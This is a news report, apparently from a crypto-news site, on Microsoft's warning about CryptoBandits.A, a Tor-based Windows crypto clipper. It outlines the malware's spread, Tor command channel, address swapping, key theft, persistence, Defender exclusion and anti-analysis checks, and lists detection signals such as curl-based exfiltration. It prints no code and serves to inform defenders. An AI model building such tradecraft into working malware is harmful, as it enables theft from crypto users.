Microsoft warns of CryptoBandits.A, a Tor-based Windows clipper stealing wallet data and hijacking crypto transfers.
Microsoft has warned about a Windows-based crypto clipper designed to steal wallet data and alter crypto transfers.
The malware has affected users since February 2026, according to Microsoft Threat Intelligence and Microsoft Defender Experts.
The campaign uses malicious .lnk shortcuts and USB drives to spread across compromised Windows devices.
Microsoft Defender Antivirus detects the threat as Trojan:Win32/CryptoBandits.A, while Defender for Endpoint flags related activity.
Malware Uses Tor to Hide Command Servers
Microsoft said the malware launches through Windows Script Host and ActiveX-based commands after a user opens a malicious shortcut.
The script then starts a renamed Tor file called ugate.exe in a hidden window. After Tor loads, the malware contacts hidden-service command servers through a local proxy.
This method avoids the use of exposed IP-based command infrastructure, making tracking harder for defenders.
The malware routes traffic through localhost:9050, which is commonly linked to Tor SOCKS5 proxy activity. Microsoft described this behavior as a strong warning sign for security teams.
Microsoft Warns of Tor-Based Crypto Clipper Targeting Wallet Data
Microsoft Threat Intelligence and Microsoft Defender Experts said they identified a Windows-based crypto clipper that has affected users since February 2026. The malware spreads via malicious .lnk shortcuts and… pic.twitter.com/tDZ6CNg322
— Wu Blockchain (@WuBlockchain) June 19, 2026
The clipper also creates a victim ID before registering the infected device with its command server.
That connection allows the attacker to send instructions and receive stolen data. As a result, the tool works as both a crypto stealer and a small remote access backdoor.
Clipper Targets Wallet Addresses and Keys
The malware monitors clipboard activity at a high rate to find crypto wallet addresses and other valuable data.
When a user copies a wallet address, the clipper can replace it with an attacker-controlled address. This can redirect a transfer before the user notices the change.
Microsoft said the malware can also steal seed phrases, private keys, and other wallet-related information.
These details can give attackers access to funds stored in affected crypto wallets. The malware can also take screenshots and send them to its command server.
The threat includes an anti-analysis check that looks for Task Manager on the infected system.
When the Task Manager is detected, the script may stop running to avoid review. This feature can make manual investigation harder during early checks.
Read Also:
Hackers Secretly Target Crypto Developers With Dangerous TrapDoor Malware
USB Spreading Raises Enterprise Risk
Microsoft said the campaign includes a worm component that helps the malware spread through compromised devices.
The worm creates malicious shortcuts that imitate legitimate files found on the system. It can also use USB drives to move between machines.
The malware adds scheduled tasks to maintain execution and persistence after infection.
It also delivers file-based payloads and attempts to exclude them from Defender scanning. These steps help the malware remain active after a device restart.
For defenders, Microsoft pointed to behavior-based signals as the clearest detection path.
These include script interpreters spawning unusual child processes and PowerShell commands tied to screen capture.
Clipboard inspection, crypto-address replacement, curl-based exfiltration, and Tor proxy usage are also key signs.
The warning comes as crypto users continue to rely on copied wallet addresses for transfers.
Microsoft advised attention to endpoint behavior, removable drives, and suspicious shortcut activity.
The campaign shows how wallet transfers can be hijacked through common Windows features and user actions.
Leave a Reply
You must be logged in to post a comment.